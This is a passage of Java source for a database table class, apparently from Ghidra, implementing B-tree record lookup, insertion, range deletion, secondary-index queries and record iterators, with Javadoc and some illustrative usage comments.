return leaf.getRecordAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than or equal to the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAtOrBefore(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than or equal to the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAtOrBefore(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAtOrBefore(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than or equal to the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAtOrAfter(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than or equal
* to the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than or equal to the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAtOrAfter(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAtOrAfter(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAtOrAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Put the specified record into the stored BTree.
* @param record the record to be stored.
* @throws IOException thrown if an IO error occurs
*/
public void putRecord(DBRecord record) throws IOException {
synchronized (db) {
db.checkTransaction();
if (schema.useLongKeyNodes()) {
putLongKeyRecord(record);
}
else {
putFieldKeyRecord(record);
}
}
}
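// Illustrative usage sketch (not part of the original source): putRecord requires an active
// transaction on the owning DBHandle; "dbHandle" and "rec" are assumed to already exist.
//
// long txId = dbHandle.startTransaction();
// try {
//     table.putRecord(rec);
// } finally {
//     dbHandle.endTransaction(txId, true);
// }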
/**
* Store a record which uses a long key (requires DBHandle lock)
* @param record record to be inserted or updated
* @throws IOException thrown if an IO error occurs
*/
private void putLongKeyRecord(DBRecord record) throws IOException {
// boolean inserted = false;
try {
// ?? Do we need to validate record against schema
// Establish root node
++modCount;
LongKeyNode rootNode = null;
if (rootBufferId < 0) {
rootNode = LongKeyRecordNode.createRecordNode(nodeMgr, schema);
}
else {
rootNode = nodeMgr.getLongKeyNode(rootBufferId);
}
// Put record and update root buffer ID
long recKey = record.getKey();
LongKeyRecordNode leaf = rootNode.getLeafNode(recKey);
rootNode = leaf.putRecord(record, isIndexed ? this : null);
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
// Update maximum key
if (maximumKey < recKey) {
maximumKey = recKey;
tableRecord.setMaxKey(maximumKey);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
// inserted = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
}
/**
* Store a record which uses a Field key (requires DBHandle lock)
* @param record record to be inserted or updated
* @throws IOException thrown if an IO error occurs
*/
private void putFieldKeyRecord(DBRecord record) throws IOException {
// boolean inserted = false;
try {
// ?? Do we need to validate record against schema
// Establish root node
++modCount;
FieldKeyNode rootNode = null;
if (rootBufferId < 0) {
rootNode = schema.useFixedKeyNodes() ? FixedKeyRecordNode.createRecordNode(nodeMgr)
: new VarKeyRecordNode(nodeMgr, schema.getKeyFieldType());
}
else {
rootNode = getFieldKeyNode(rootBufferId);
}
// Put record and update root buffer ID
Field recKey = record.getKeyField();
FieldKeyRecordNode leaf = rootNode.getLeafNode(recKey);
rootNode = leaf.putRecord(record, isIndexed ? this : null);
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
// NOTE: Maximum key is not tracked
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
// inserted = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
}
/**
* Delete a record identified by the specified key value.
* @param key unique record key.
* @return true if record was deleted successfully.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecord(long key) throws IOException {
synchronized (db) {
db.checkTransaction();
boolean result = false;
if (rootBufferId < 0) {
return false;
}
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
try {
++modCount;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(key);
rootNode = leaf.deleteRecord(key, isIndexed ? this : null);
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Delete a record identified by the specified key value.
* @param key unique record key.
* @return true if record was deleted successfully.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecord(Field key) throws IOException {
synchronized (db) {
db.checkTransaction();
boolean result = false;
if (rootBufferId < 0) {
return false;
}
if (key instanceof LongField) {
return deleteRecord(key.getLongValue());
}
try {
++modCount;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
FieldKeyRecordNode leaf = rootNode.getLeafNode(key);
rootNode = leaf.deleteRecord(key, isIndexed ? this : null);
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Delete all records whose keys fall within the specified range, inclusive.
* @param startKey minimum key value
* @param endKey maximum key value
* @return true if one or more records were deleted.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecords(long startKey, long endKey) throws IOException {
synchronized (db) {
db.checkTransaction();
if (startKey > endKey) {
throw new IllegalArgumentException();
}
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Long key required");
}
boolean result = false;
if (rootBufferId < 0) {
return result;
}
try {
++modCount;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(startKey);
try {
// Handle partial first leaf where leftmost key is not deleted
int index = leaf.getKeyIndex(startKey);
long lastKey = 0;
if (index < 0) {
index = -index - 1;
}
if (index > 0) {
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
// delete individual records within first leaf
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
}
result = true;
if (index < leaf.keyCount) {
return result;
}
LongKeyRecordNode nextLeaf = leaf.getNextLeaf();
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKey(nextLeaf.keyCount - 1);
leaf = rootNode.getLeafNode(lastKey);
index = 0;
}
else {
lastKey = leaf.getKey(leaf.keyCount - 1);
}
// Handle additional whole leaves
while (lastKey <= endKey) {
if (isIndexed) {
for (int n = 0; n < leaf.keyCount; n++) {
deletedRecord(leaf.getRecord(schema, n));
}
}
LongKeyRecordNode nextLeaf = leaf.getNextLeaf();
rootNode = leaf.removeLeaf();
result = true;
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKey(nextLeaf.keyCount - 1);
leaf = rootNode.getLeafNode(lastKey);
}
// Handle final leaf
// delete individual records within the final leaf
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
long key = leaf.getKey(0);
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
result = true;
}
if (index == 0 && leaf.parent != null) {
leaf.parent.keyChanged(key, leaf.getKey(0));
}
}
finally {
// Update root node
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
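// Illustrative usage sketch (not part of the original source): dropping a contiguous key range from
// a long-keyed table; both endpoints are inclusive and an open transaction is assumed.
//
// boolean removedAny = table.deleteRecords(0x1000L, 0x1FFFL);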
/**
* Delete all records whose keys fall within the specified range, inclusive.
* @param startKey minimum key value
* @param endKey maximum key value
* @return true if one or more records were deleted.
* @throws IOException thrown if an IO error occurs
*/
public boolean deleteRecords(Field startKey, Field endKey) throws IOException {
synchronized (db) {
db.checkTransaction();
if (startKey.compareTo(endKey) > 0) {
throw new IllegalArgumentException();
}
if (schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
boolean result = false;
if (rootBufferId < 0) {
return result;
}
try {
++modCount;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
FieldKeyRecordNode leaf = rootNode.getLeafNode(startKey);
try {
// Handle partial first leaf where leftmost key is not deleted
int index = leaf.getKeyIndex(startKey);
Field lastKey = null;
if (index < 0) {
index = -index - 1;
}
if (index > 0) {
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
// delete individual records within first leaf
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
}
result = true;
if (index < leaf.getKeyCount()) {
return result;
}
RecordNode nextLeaf = leaf.getNextLeaf();
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKeyField(nextLeaf.getKeyCount() - 1);
leaf = rootNode.getLeafNode(lastKey);
index = 0;
}
else {
lastKey = leaf.getKeyField(leaf.getKeyCount() - 1);
}
// Handle additional whole leaves
while (lastKey.compareTo(endKey) <= 0) {
if (isIndexed) {
int count = leaf.getKeyCount();
for (int n = 0; n < count; n++) {
deletedRecord(leaf.getRecord(schema, n));
}
}
RecordNode nextLeaf = leaf.getNextLeaf();
rootNode = leaf.removeLeaf();
result = true;
if (nextLeaf == null) {
return result;
}
lastKey = nextLeaf.getKeyField(nextLeaf.getKeyCount() - 1);
leaf = rootNode.getLeafNode(lastKey);
}
// Handle final leaf
// delete individual records within the final leaf
int lastIndex = leaf.getKeyIndex(endKey);
if (lastIndex < 0) {
lastIndex = -lastIndex - 2;
}
Field key = leaf.getKeyField(0);
while (index <= lastIndex--) {
if (isIndexed) {
deletedRecord(leaf.getRecord(schema, index));
}
leaf.remove(index);
result = true;
}
if (index == 0 && leaf.getParent() != null) {
leaf.getParent().keyChanged(key, leaf.getKeyField(0), leaf);
}
}
finally {
// Update root node
if (rootNode != null) {
int id = rootNode.getBufferId();
if (rootBufferId != id) {
rootBufferId = id;
tableRecord.setRootBufferId(rootBufferId);
}
}
else {
rootBufferId = -1;
tableRecord.setRootBufferId(rootBufferId);
}
}
}
finally {
// Release node buffers and update record count
int delta = nodeMgr.releaseNodes();
if (delta != 0) {
result = true;
recordCount += delta;
tableRecord.setRecordCount(recordCount);
}
}
return result;
}
}
/**
* Find the primary keys corresponding to those records which contain the
* specified field value in the specified record column. The table must
* have been created with long keys and a secondary index on the specified
* column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
* @return list of primary keys
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public Field[] findRecords(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.findPrimaryKeys(field);
}
}
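// Illustrative usage sketch (not part of the original source): looking up records through a
// secondary index. NAME_COL is a hypothetical indexed column assumed to hold StringField values.
//
// Field[] keys = table.findRecords(new StringField("example"), NAME_COL);
// for (Field key : keys) {
//     DBRecord rec = table.getRecord(key);
// }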
/**
* Get the number of records which contain the
* specified field value in the specified record column. The table must
* have been created with a secondary index on the specified column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
* @return number of records which match the specified field value.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public int getMatchingRecordCount(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.getKeyCount(field);
}
}
/**
* Determine if a record exists with the specified value within the specified
* column. The table must have been created with a secondary index on the
* specified column index.
* @param field the field value
* @param columnIndex the record schema column which should be searched.
	 * @return true if one or more records exist with the specified value.
* @throws IOException thrown if IO error occurs
*/
public boolean hasRecord(Field field, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.hasRecord(field);
}
}
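	// Usage sketch (illustrative) for the three secondary-index query methods above.
	// Assumes column 2 of the schema is indexed and holds StringField values; the value
	// and column number are hypothetical.
	//
	//   Field value = new StringField("symbolName");
	//   if (table.hasRecord(value, 2)) {
	//       int n = table.getMatchingRecordCount(value, 2);
	//       Field[] primaryKeys = table.findRecords(value, 2);
	//       // n == primaryKeys.length; each entry is the primary key of a matching record
	//   }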
/**
* Iterate over all the unique index field values. Index values are
* returned in an ascending sorted order with the initial iterator position
* set to the minimum index value.
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexFieldIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator();
}
}
/**
* Iterate over all the unique index field values within the specified range identified
* by minField and maxField. Index values are returned in an ascending sorted order.
* @param minField minimum index column value, if null absolute minimum is used
* @param maxField maximum index column value, if null absolute maximum is used
* @param before if true initial position is before minField, else position
* is after maxField
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexFieldIterator(Field minField, Field maxField, boolean before,
int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator(minField, maxField, before);
}
}
/**
* Iterate over all the unique index field values within the specified range identified
* by minField and maxField. Index values are returned in an ascending sorted order with the
* initial iterator position corresponding to the startField.
* @param minField minimum index column value, if null absolute minimum is used
* @param maxField maximum index column value, if null absolute maximum is used
* @param startField index column value corresponding to initial position of iterator
* @param before if true initial position is before startField value, else position
* is after startField value
* @param columnIndex identifies an indexed column.
* @return index field iterator.
* @throws IOException if a secondary index does not exist for the specified
* column or an I/O error occurs.
*/
public DBFieldIterator indexFieldIterator(Field minField, Field maxField, Field startField,
boolean before, int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.indexIterator(minField, maxField, startField, before);
}
}
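	// Usage sketch (illustrative): enumerate the unique indexed values of column 2 that fall
	// within ["a", "z"]. Assumes the column is indexed and holds StringField values.
	//
	//   DBFieldIterator it = table.indexFieldIterator(new StringField("a"),
	//       new StringField("z"), true /* position before minField */, 2);
	//   while (it.hasNext()) {
	//       Field indexedValue = it.next();   // ascending order, one entry per unique value
	//   }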
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. This table must have been constructed with a secondary
* index on the specified column.
* @param columnIndex schema column to sort on.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column or an I/O error occurs.
*/
public RecordIterator indexIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIterator());
}
}
/**
* Iterate over a range of records using a secondary index. Sorting occurs on the
	 * specified schema column. The iterator is initially positioned before the startValue or
	 * after the endValue based upon the atStart parameter.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting and minimum value of the secondary index field.
* @param endValue the ending and maximum value of the secondary index field.
* @param atStart if true, position the iterator before the start value.
* Otherwise, position the iterator after the end value.
*
* @return record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIterator(int columnIndex, Field startValue, Field endValue,
boolean atStart) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIterator(startValue, endValue, atStart));
}
}
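	// Usage sketch (illustrative): iterate records ordered by indexed column 2, limited to a
	// value range. The Field type must match the indexed column's schema type.
	//
	//   RecordIterator ri = table.indexIterator(2, new StringField("a"),
	//       new StringField("m"), true /* start before the range */);
	//   while (ri.hasNext()) {
	//       DBRecord rec = ri.next();   // records returned in indexed-column order
	//   }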
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately follows
* the specified startValue. If this value does not exist, the initial position corresponds
* to where it would exist.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorAfter(int columnIndex, Field startValue) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIteratorAfter(startValue));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately precedes
* the specified startValue. If this value does not exist, the initial position corresponds
* to where it would exist.
* This table must have been constructed with a secondary index on the specified column.
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorBefore(int columnIndex, Field startValue)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this, indexTable.keyIteratorBefore(startValue));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately follows
* the specified startValue and primaryKey. If no such entry exists, the initial position
* corresponds to where it would exist.
* <p>
* This table must have been constructed with a secondary index on the specified column.
*
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @param primaryKey the primary key associated with the startField.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorAfter(int columnIndex, Field startValue, Field primaryKey)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIteratorAfter(startValue, primaryKey));
}
}
/**
* Iterate over the records using a secondary index. Sorting occurs on the
* specified schema column. The iterator's initial position immediately precedes
* the specified startValue and primaryKey. If no such entry exists, the initial position
* corresponds to where it would exist.
* <p>
* This table must have been constructed with a secondary index on the specified column.
*
* @param columnIndex schema column to sort on.
* @param startValue the starting value of the secondary index field.
* @param primaryKey the primary key associated with the startField.
* @return RecordIterator record iterator.
* @throws IOException if a secondary index does not exist for the specified
* column, or the wrong field type was specified, or an I/O error occurs.
*/
public RecordIterator indexIteratorBefore(int columnIndex, Field startValue, Field primaryKey)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return new KeyToRecordIterator(this,
indexTable.keyIteratorBefore(startValue, primaryKey));
}
}
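	// Usage sketch (illustrative): resume index-ordered iteration just past a previously
	// visited (index value, primary key) pair, e.g. when processing in batches. The
	// lastIndexValue/lastPrimaryKey variables are hypothetical saved positions.
	//
	//   RecordIterator ri = table.indexIteratorAfter(2, lastIndexValue, lastPrimaryKey);
	//   while (ri.hasNext()) {
	//       DBRecord rec = ri.next();
	//       lastIndexValue = rec.getFieldValue(2);
	//       lastPrimaryKey = rec.getKeyField();
	//   }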
/**
* Iterate over all primary keys sorted based upon the associated index key.
* @param columnIndex schema column to sort on.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator();
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned before the first index buffer whose index key
* is greater than or equal to the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorBefore(int columnIndex, Field startField)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorBefore(startField);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned after the index buffer whose index key
* is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorAfter(int columnIndex, Field startField)
throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorAfter(startField);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned before the primaryKey within the index buffer
* whose index key is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @param primaryKey initial position within index buffer if index key matches startField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorBefore(int columnIndex, Field startField,
Field primaryKey) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorBefore(startField, primaryKey);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
* The iterator is initially positioned after the primaryKey within the index buffer
* whose index key is equal to the specified startField value or immediately before the first
* index buffer whose index key is greater than the specified startField value.
* @param columnIndex schema column to sort on
* @param startField index column value which determines initial position of iterator
* @param primaryKey initial position within index buffer if index key matches startField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIteratorAfter(int columnIndex, Field startField,
Field primaryKey) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIteratorAfter(startField, primaryKey);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
	 * The iterator is limited to the range of index keys from minField through maxField, inclusive.
* If atMin is true, the iterator is initially positioned before the first index
* buffer whose index key is greater than or equal to the specified minField value.
* If atMin is false, the iterator is initially positioned after the first index
* buffer whose index key is less than or equal to the specified maxField value.
* @param columnIndex schema column to sort on
* @param minField minimum index column value
* @param maxField maximum index column value
* @param atMin if true, position iterator before minField value,
* Otherwise, position iterator after maxField value.
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex, Field minField, Field maxField,
boolean atMin) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator(minField, maxField, atMin);
}
}
/**
* Iterate over all primary keys sorted based upon the associated index key.
	 * The iterator is limited to the range of index keys from minField through maxField, inclusive.
* The iterator is initially positioned before or after the specified startField index value.
* @param columnIndex schema column to sort on
* @param minField minimum index column value
* @param maxField maximum index column value
* @param startField starting indexed value position
	 * @param before if true positioned before startField value, else positioned after startField value
* @return primary key iterator
* @throws IOException thrown if IO error occurs
*/
public DBFieldIterator indexKeyIterator(int columnIndex, Field minField, Field maxField,
Field startField, boolean before) throws IOException {
synchronized (db) {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable == null) {
throw new IOException("Index required (" + getName() + "," + columnIndex + ")");
}
return indexTable.keyIterator(minField, maxField, startField, before);
}
}
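	// Usage sketch (illustrative): walk primary keys ordered by the indexed column without
	// loading records. minValue/maxValue are hypothetical Field bounds of the indexed type.
	//
	//   DBFieldIterator keys = table.indexKeyIterator(2, minValue, maxValue, true /* at min */);
	//   while (keys.hasNext()) {
	//       Field primaryKey = keys.next();   // fetch the full record later only if needed
	//   }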
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator() throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return new LongKeyRecordIterator();
}
return new FieldKeyRecordIterator(null, null, null);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param startKey the first primary key.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
return new LongKeyRecordIterator(Long.MIN_VALUE, Long.MAX_VALUE, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param minKey the minimum primary key.
* @param maxKey the maximum primary key.
* @param startKey the initial iterator position.
* @return record iterator
* @throws IOException if an I/O error occurs.
* @throws IllegalArgumentException if long keys are not in use or startKey
* is less than minKey or greater than maxKey.
*/
public RecordIterator iterator(long minKey, long maxKey, long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new IllegalArgumentException("Field key required");
}
return new LongKeyRecordIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param startKey the first primary key.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return new LongKeyRecordIterator(Long.MIN_VALUE, Long.MAX_VALUE,
startKey.getLongValue());
}
return new FieldKeyRecordIterator(null, null, startKey);
}
}
/**
* Iterate over the records in ascending sorted order. Sorting occurs on the primary key value
* starting at the specified startKey.
* @param minKey the minimum primary key, may be null.
* @param maxKey the maximum primary key, may be null.
* @param startKey the initial iterator position, if null minKey is also start.
* @return record iterator
* @throws IOException if an I/O error occurs.
*/
public RecordIterator iterator(Field minKey, Field maxKey, Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
long min = minKey != null ? minKey.getLongValue() : Long.MIN_VALUE;
long max = maxKey != null ? maxKey.getLongValue() : Long.MAX_VALUE;
long start = startKey != null ? startKey.getLongValue() : min;
return new LongKeyRecordIterator(min, max, start);
}
return new FieldKeyRecordIterator(minKey, maxKey, startKey);
}
}
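	// Usage sketch (illustrative): primary-key-ordered traversal over a bounded key range.
	// For a long-keyed table the Field bounds are converted to long values as shown above;
	// minKey/maxKey are hypothetical Field values.
	//
	//   RecordIterator ri = table.iterator(minKey, maxKey, minKey /* start at minKey */);
	//   while (ri.hasNext()) {
	//       DBRecord rec = ri.next();
	//       // ri.delete() may be called here to remove the record just returned
	//   }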
/**
* Iterate over all long primary keys in ascending sorted order.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
